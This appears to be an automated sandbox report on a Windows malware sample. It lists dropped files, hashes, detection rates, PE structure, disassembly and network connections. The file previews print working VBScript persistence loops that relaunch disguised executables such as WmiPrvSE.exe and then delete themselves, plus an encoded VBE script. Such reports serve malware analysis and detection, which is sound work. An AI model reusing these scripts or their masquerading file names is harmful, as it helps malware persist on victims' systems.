                                                SHA-256:CD3FBFA5C3BFE4153579168B0757C62E1ACEF9C9C4DB1E143416A4AFC87329FD
                                                SHA-512:50974947F4164FFE869709C87B3813BD2D4D1C6EA639BEA88F88A633A7F7F4D3FC30D937870024AF64D7C4DFAE54652142C3E4B485526A4FAB3F74BD669F0B2B
                                                Malicious:false
                                                Preview:pXEngD4Tm8Is2n8gDeCuqGOKY
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.230905880222201
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KKljMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNig:9AnyHfCATKljknpD/AEmHob/uhEjdxWo
                                                MD5:434D4C6374370DAAEDB85219B66296D7
                                                SHA1:DFA1F3535D9DFA20DD479A9B14CBC250E8303C6B
                                                SHA-256:0216A901FB5F8980FE36E5852E00A4C14C3C7FE60C8A5316AB27E1DF18C11D32
                                                SHA-512:A4288E6566791CB9F5B655B536F6E205E40E1C760FA40B0B14658E9A20848EC317A4C332E0D47FB4947AF55D0E172C3F929A0B8A039189E36D6B9B750E2ACC0D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "6112"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):720
                                                Entropy (8bit):5.230225012172656
                                                Encrypted:false
                                                SSDEEP:12:9vWdTzyMsRfhMA6KcjMpOsIouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbNiVC:9AnyHfCATcjknpD/AEmHob/uhEjdxWgr
                                                MD5:01680A6ABC5ACE13F72EC66AE6979BC4
                                                SHA1:014C3631F6ED6129F9C14D5AD8006DC31C81D238
                                                SHA-256:0DF0A1169C89A6123D06E5871625375CAB94B02D14E90431F518B11E10F6D70C
                                                SHA-512:A1951F0865758379FCA4BD357EA4C2900B9E9FB56B80C190274DF3F9D4DB0AB3B52F1649A911864F9D46ED38DD4CD06C7627082292A9FAF631E7EF05B292C4D3
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "8044"..mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\Users\Default\Downloads\WmiPrvSE.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):496
                                                Entropy (8bit):5.339665654651768
                                                Encrypted:false
                                                SSDEEP:12:9vWdDIyRfhMAyjMpOsTEfZ5jObWo0BMhFiXAp4QCk3:9A3fCAyjkIffwcMDYAp4QCw
                                                MD5:6A5E04BEEDC77DA679FF4A1FC9208993
                                                SHA1:CC056EB4C60E85515B49F5C7418D34EA0EF04E98
                                                SHA-256:84C0A10411844EDDD7C18F8E127CC3CA12933AB59A6CA028375CACA101CBCC29
                                                SHA-512:BB24121F0CC226CDF615C03425525EEFD461E771E9060E91ECF12DC925AA0528C8A307AE1CD41A9A5C4B217D5E4F4B3DF293365DC558E2DD8CB85E11EA05C790
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Users\Default User\Downloads\WmiPrvSE.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\ee4d24973b24ff5ccc207778de96815efb945a21.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):52
                                                Entropy (8bit):5.07053803540718
                                                Encrypted:false
                                                SSDEEP:3:nvPkpjCzOQz5buiRiIV:vPpb1b3EY
                                                MD5:751CE1252006C898021625D1024CA73A
                                                SHA1:5973FE0B678B0691DA283723BB4C89B93E6DB9EC
                                                SHA-256:5543B34D7267C54458B940BA4008D1AA4C1138EEF05E3151FBA4ED6319603933
                                                SHA-512:EEDCD5C066DAFD688CAC86071EE716A5AC136C436EDD1879B74F8CC78C1B36E278C5639B5928055B656C682030B8C43B3EADAEF08430AFD9A82AEF61B4A7A054
                                                Malicious:false
                                                Preview:71JjRhYxBkcFveWKeeUm6bh5udvSf5U0Y39KCAWk144GV30VlFLZ
                                                Process:C:\msPortRefnetdhcp\componentWininto.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3550208
                                                Entropy (8bit):7.781657928203425
                                                Encrypted:false
                                                SSDEEP:49152:/wxmcexfNwuwHmIZCw/55uvWVdgv8XquMvQ0CC3QbYGpRFCwEg5/MPoxPr2G:4xmRwLHVZCC55YkdOsfMvBh0ND4wELW
                                                MD5:53758CEA18D59182A809208313D5042A
                                                SHA1:0234E732DEA00414C79CA2CE8A55F61843F282D2
                                                SHA-256:5CAE0557099A16D45A03F05F95390EC5BD5BA5A44EDD73286E741FE09F93BDDF
                                                SHA-512:3D7900C7A6060367BEAF7ABDE33027958D28091B001D25C395D191F0CF442216D5CACFF4A123BBD1AE767F471AE3A517659F9C42798BE8C772F2F7411A7B952E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 88%
                                                • Antivirus: Virustotal, Detection: 65%, Browse
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):34
                                                Entropy (8bit):4.124083797069061
                                                Encrypted:false
                                                SSDEEP:3:LlzRWDNMSdn:PWbn
                                                MD5:677CC4360477C72CB0CE00406A949C61
                                                SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
                                                SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
                                                SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
                                                Malicious:false
                                                Preview:MsgBox "TestDefault, Message!", 64
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):42
                                                Entropy (8bit):4.1728107335198645
                                                Encrypted:false
                                                SSDEEP:3:I5my4UTGTVKLA+Ls0E:IQUuOKJ
                                                MD5:B025044714B20D9D7069A2C2F55DDF04
                                                SHA1:36D7DCE3F0FA6A1BD86E795BCDE3C9A1B2E9A7F6
                                                SHA-256:E6D9546E0E8D9B92EF203F408F33722C3B4FFCD2F400AA08BB0B49AC182B69B3
                                                SHA-512:3A24C4AD9C1B298A97C5D4E994233A84DC27D4C0D612CC8D8E94CBD16E3CEAEC96D66D4503A6A506644DE509A3509F53EA122BF92CC09DE087254F40B5A1C65C
                                                Malicious:false
                                                Preview:"C:\msPortRefnetdhcp\componentWininto.exe"
                                                Process:C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):208
                                                Entropy (8bit):5.775204519466763
                                                Encrypted:false
                                                SSDEEP:6:GogwqK+NkLzWbH9WF08nZNDd3RL1wQJRdxcr3NvueUfU:GoBMCzWL74d3XBJDC5Us
                                                MD5:C7C964910BEF0490E2A401349C25126B
                                                SHA1:BA3581DC5945F35F83BC216FC5A1DECFBE6E47EF
                                                SHA-256:D41A100832E46A8928AD06780A40E08F147E97AC014170CA48779F98F4D5B7FF
                                                SHA-512:198C571A056D5896928B5A93C918E9F7407DD0D5E39893DB39A1DBCAD9D6EC2DF63925CBE69346F8F4681BFE37C23844FEEE5CBD1F45BC9C48796AEF1D66372F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:#@~^twAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ:dhWMYI.0.nY9t^wJ:.B^r|GFxsMr..CR(lDJSPTS,0CVknEzoAAA==^#~@.
                                                Process:C:\Windows\System32\w32tm.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):151
                                                Entropy (8bit):4.798324055503179
                                                Encrypted:false
                                                SSDEEP:3:VLV993J+miJWEoJ8FX7sXpDZKUHLvoE9Avj:Vx993DEUZDZKykE9q
                                                MD5:587332B5D3D0AF9F512650B6D1AD3D83
                                                SHA1:C2F072E11BC788EFA235857AF84AEE3EAD10DEFD
                                                SHA-256:B5B733B2AEF194CFB3F93921E0396273C073A58E4D6DBBEE2B98DF5DA463E073
                                                SHA-512:9242E0C6703D0C8895BF8529690C0DBB54D5D5C9CBD21C254906371233DD6F188E7662ADD6825DDF72E624AA6503A1C85C199C4758C5D6BF893FAA8396290AAD
                                                Malicious:false
                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/04/2024 11:46:00..11:46:00, error: 0x80072746.11:46:05, error: 0x80072746.
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.587756781339567
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.94%
                                                • Win32 Executable (generic) a (10002005/4) 49.89%
                                                • Win32 Executable Delphi generic (14689/80) 0.07%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                File name:4c6fK85tK7.exe
                                                File size:4'329'984 bytes
                                                MD5:68dfe1e08b8cc7d19ff72334fdd09db8
                                                SHA1:34fb36f9b553c26b0753f540b6a8af1760bb74dc
                                                SHA256:a5f4363625928d7fb64087212bd9d094972260739b274f44b53bbbd5be6d19b7
                                                SHA512:035d3806dafbd5e3a6358072363267178215c74a2f66750792e839d8f24a4244338d1a59862953eb872b5a13ae675647310818a05f1f70206f1ea15157cc8686
                                                SSDEEP:98304:b2iJbE5xmRwLHVZCC55YkdOsfMvBh0ND4wELWZ:yMaxAWHVkq5Y2fMkNDILWZ
                                                TLSH:DA16AD0179008953E0071632F2AA5D4C8BA7EE709F65E35F6DB93F6B2D373D228185A7
                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                Icon Hash:2f17b1d9dbc36535
                                                Entrypoint:0x4020cc
                                                Entrypoint Section:CODE
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                DLL Characteristics:
                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:d59a4a699610169663a929d37c90be43
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                mov ecx, 0000000Ch
                                                push 00000000h
                                                push 00000000h
                                                dec ecx
                                                jne 00007FDB146D321Bh
                                                push ecx
                                                push ebx
                                                push esi
                                                push edi
                                                mov eax, 0040209Ch
                                                call 00007FDB146D2C90h
                                                xor eax, eax
                                                push ebp
                                                push 00402361h
                                                push dword ptr fs:[eax]
                                                mov dword ptr fs:[eax], esp
                                                lea edx, dword ptr [ebp-14h]
                                                mov eax, 00402378h
                                                call 00007FDB146D3069h
                                                mov eax, dword ptr [ebp-14h]
                                                call 00007FDB146D3139h
                                                mov edi, eax
                                                test edi, edi
                                                jng 00007FDB146D3456h
                                                mov ebx, 00000001h
                                                lea edx, dword ptr [ebp-20h]
                                                mov eax, ebx
                                                call 00007FDB146D30F8h
                                                mov ecx, dword ptr [ebp-20h]
                                                lea eax, dword ptr [ebp-1Ch]
                                                mov edx, 00402384h
                                                call 00007FDB146D2888h
                                                mov eax, dword ptr [ebp-1Ch]
                                                lea edx, dword ptr [ebp-18h]
                                                call 00007FDB146D302Dh
                                                mov edx, dword ptr [ebp-18h]
                                                mov eax, 00404680h
                                                call 00007FDB146D2760h
                                                lea edx, dword ptr [ebp-2Ch]
                                                mov eax, ebx
                                                call 00007FDB146D30C6h
                                                mov ecx, dword ptr [ebp-2Ch]
                                                lea eax, dword ptr [ebp-28h]
                                                mov edx, 00402390h
                                                call 00007FDB146D2856h
                                                mov eax, dword ptr [ebp-28h]
                                                lea edx, dword ptr [ebp-24h]
                                                call 00007FDB146D2FFBh
                                                mov edx, dword ptr [ebp-24h]
                                                mov eax, 00404684h
                                                call 00007FDB146D272Eh
                                                lea edx, dword ptr [ebp-38h]
                                                mov eax, ebx
                                                call 00007FDB146D3094h
                                                mov ecx, dword ptr [ebp-38h]
                                                lea eax, dword ptr [ebp-34h]
                                                mov edx, 0040239Ch
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5000 | 0x302 | .idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9000 | 0x41eee0 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0x1c8 | .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x7000 | 0x18 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                CODE | 0x1000 | 0x13b8 | 0x1400 | e5913936857bed3b3b2fbac53e973471 | False | 0.6318359375 | data | 6.340990548290613 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                DATA | 0x3000 | 0x7c | 0x200 | cef89de607e490725490a3cd679af6bb | False | 0.162109375 | Matlab v4 mat-file (little endian) , numeric, rows 0, columns 4230400 | 1.1176271682252383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                BSS | 0x4000 | 0x695 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata | 0x5000 | 0x302 | 0x400 | 3d2f2fc4e279cba623217ec9de264c4f | False | 0.3876953125 | data | 3.47731642923935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .tls | 0x6000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rdata | 0x7000 | 0x18 | 0x200 | 467f29e48f3451df774e13adae5aafc2 | False | 0.05078125 | data | 0.1991075177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                .reloc | 0x8000 | 0x1c8 | 0x200 | 9859d413c7408cb699cca05d648c2502 | False | 0.876953125 | data | 5.7832974211095225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x9000 | 0x41eee0 | 0x41f000 | d516d442e1838c14787c7e406b62706b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_ICON | 0x9260 | 0x10408 | Device independent bitmap graphic, 128 x 252 x 32, image size 64512, resolution 23925 x 23925 px/m | | | 0.3633427472659536
                                                RT_RCDATA | 0x19668 | 0x40e800 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.42171764373779297
                                                RT_RCDATA | 0x427e68 | 0xd | ISO-8859 text, with no line terminators | | | 1.6153846153846154
                                                RT_RCDATA | 0x427e78 | 0x1 | very short file (no magic) | | | 9.0
                                                RT_RCDATA | 0x427e7c | 0x1 | very short file (no magic) | | | 9.0
                                                RT_RCDATA | 0x427e80 | 0x10 | data | | | 1.5
                                                RT_RCDATA | 0x427e90 | 0x1 | very short file (no magic) | | | 9.0
                                                RT_RCDATA | 0x427e94 | 0x38 | data | | | 1.0714285714285714
                                                RT_GROUP_ICON | 0x427ecc | 0x14 | data | | | 1.25
                                                DLL | Import
                                                kernel32.dll | GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
                                                kernel32.dll | WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
                                                shfolder.dll | SHGetFolderPathA
                                                shell32.dll | ShellExecuteA
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Apr 25, 2024 10:18:52.134754896 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134778976 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134799004 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134840965 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134852886 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134881973 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134921074 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134928942 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.134959936 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.134999990 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.135015965 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.135222912 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.135262012 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.135292053 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.137105942 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394088030 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394155979 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394197941 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394238949 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394243002 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394279957 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394308090 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394324064 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394375086 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394401073 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394431114 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394471884 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394490957 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394509077 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394548893 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394562006 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394587994 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394625902 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394642115 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394655943 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394675016 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394696951 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394705057 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394717932 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394737005 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394747019 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394753933 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394772053 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394782066 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394792080 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394815922 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394834995 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394850969 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394860983 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394879103 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394900084 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394921064 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394926071 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394941092 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394958973 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394968033 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.394975901 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.394995928 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395004988 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395015955 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395029068 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395032883 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395051956 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395062923 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395073891 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395092964 CEST8049743141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:18:52.395104885 CEST4974380192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:18:52.395112038 CEST8049743141.8.194.74192.168.2.4
